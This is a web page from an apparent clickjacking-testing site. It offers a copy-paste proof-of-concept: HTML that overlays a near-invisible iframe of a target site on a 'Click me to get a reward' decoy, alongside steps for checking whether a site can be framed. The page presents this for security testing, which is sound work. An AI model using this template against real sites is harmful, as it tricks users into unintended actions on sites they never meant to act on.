<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0,">
    <title> BEST Royalty-Free ClickJacking POC | Proof of concept </title>
    <link rel="icon" href="https://i.ibb.co/CVZQ8Bt/Picsart-23-09-26-02-16-00-213.png">
    <meta name="keywords" content="Test Clickjacking, Online clickjacking test, Clickjacking tool, What is clickjacking, Fix clickjacking, Clickjacking
    vulnerability, Exploit clickjacking, ClickJacking POC"/>

    <link rel="stylesheet" href="../stylsheets/footer.css">
    <link rel="stylesheet" href="../stylsheets/article.css">

    <meta name="description" content="Get a copyright free click-jacking test proof of concept (POC), that you can copy paste whether you're a security expert or adming, you can also test your website for click-jacking">
    <!-- google font -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700;800&family=Poppins:wght@100;400;500;600;700&display=swap" rel="stylesheet">

    <!-- prims js -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.27.0/themes/prism.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.1.0/styles/dark.min.css">
    <!-- bootstrap -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">
    <script defer src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"></script>
    <!-- social sharing -->
    <meta property="og:title" content="Copyright ClickJacking Proof of concept (POC)">
    <meta property="og:description" content="Get a copyright free click-jacking proof of concept (POC), that you can copy paste whether you're a security expert or adming, you can also test your website for click-jacking">

    <meta property="og:image" content="https://i.ibb.co/375WDqR/a-2d-illustration-of-a-clickjacking-attack-on-a-website-professional-2-Nqdb-Q7y-upscaled-1.webp">

    <meta property="og:url" content="https://clickjacker.live">
    <meta property="og:type" content="website">
</head>
<body>
  <nav style="background-color: #1b1a1a !important;" class="navbar navbar-expand-lg bg-dark navbar-dark">
    <div class="container-fluid">
      <a class="navbar-brand" href="../index.html">Click Jacking Tester</a>
      <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>
      <div class="collapse navbar-collapse" id="navbarNavAltMarkup">
        <div class="navbar-nav ms-auto">
          <a class="nav-link " aria-current="page" href="../index.html">Home</a>
          <a class="nav-link" href="../About-us">About us</a>
          <a class="nav-link" href="../contact-us/">contact-us</a>
          <a class="nav-link" href="../Privacy-policy/">Privacy Policy</a>
        </div>
      </div>
    </div>
  </nav> 

    <div class="cnt">
        <div class="txt">
          <hr>
        <h2>Clickjacking Test POC</h2>

        <p>Today in this article we'll share one of the BEST Click-Jacking Proof of Concept (POC), It consists of copyright-free text and code that can be used  as a reference for making standard clickjacking POC: - 
                <li><a class="glink" href="#pre-steps">
                    Pre steps
                </a></li>
                <li><a class="glink" href="#code-proof">
                    Code Proof (CP)
                </a></li>
        </p>

        <h2 id="pre-steps">Pre steps</h2>

        <p> Before letting anyone know about this threat/loophole first test it well, here are steps you can take to test any website for click-jacking vulnerabilities -
            <br> <br>
            <li class="number">Go to <a class="glink" href="../index.html">click jacking-tester</a></li>
            <li class="number">Input the target URL in there</li>
            <li class="number">Click "check" button or hit enter</li>
            <li class="number">Wait and see if the website loads in "iFrame"</li>
            <p>If it doesn't load, then it's safe from <a class="glink" href="../Whats-clickjacking">Click Jacking</a>, but if it does load in iFrame then it's vulnerable to <a class="glink" href="../Whats-clickjacking">Click Jacking.</a></p>
            <li class="number">Grab the "result-URL" of the vulnerable website by clicking the "share results" button </li>
        </p>
        <div class="img">
            <img src="../assets/cop.webp" width="90%" alt="copyright free click jacking COP">
        </div>

        <h2 id="code-proof">Code Proof</h2>
        
        <pre class="code">
            <code class="html">
&lt;html&gt;
&lt;head&gt;
    &lt;style&gt;
        #attacked_Site {
            position: relative;
            width: 128px;
            height: 128px;
            opacity: 0.00001;
            z-index: 2;
        }
        #trap_site {
            position: absolute;
            width: 300px;
            height: 400px;
            z-index: 1;
        }
    &lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;div id="trap_site"&gt;
    &lt;p&gt; <span class="white">Click me to get a reward</span>  &lt;/p&gt;
    &lt;/div&gt;
    &lt;iframe id="attacked_Site" src="https://example.com"&gt;
    &lt;/iframe&gt;
&lt;/body&gt;
&lt;/html&gt;
</code>
        </pre>
        <li class="number">
          Replace the "https://example" with your URL
        </li> <br>
        <p>
          Hope you found this helpful!
          If you want to test your site's security against clickjacking attacks or you want to make sure that your site isn't at risk,
          you can check that here - <a class="glink" href="../index.html">2023 FREE Click Jacking tester</a> 
        </p>
    </div>

        <div class="sidebar">
          <a href="../index.html">
            <div class="box">
                <img src="../assets/tester.webp" alt="free click jacking tester 2023">
                <hr>
                <h6>
                  Test your site for click Jacking vulnerabilities.
                </h6>
            </div>
          </a>
        </div>
    </div>

    <footer>
      <hr>
        <div class="fHead">
          <h3 class="fHeading">
            Click Jacking Tester
          </h3>
        </div>
<div class="fLinks">
  <a href="../Privacy-policy">Privacy Policy</a>
  <a href="../About-us">About us</a>
  <a href="../contact-us/">Contact us</a>
</div>
<div id="copyright">&#169; Copyright</div>
<script>
  const copyElem = document.getElementById("copyright");
  copyElem.innerHTML += + new Date(). getFullYear() + " - All Rights Reserved";
</script>
    </footer>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.1.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

</body>
</html>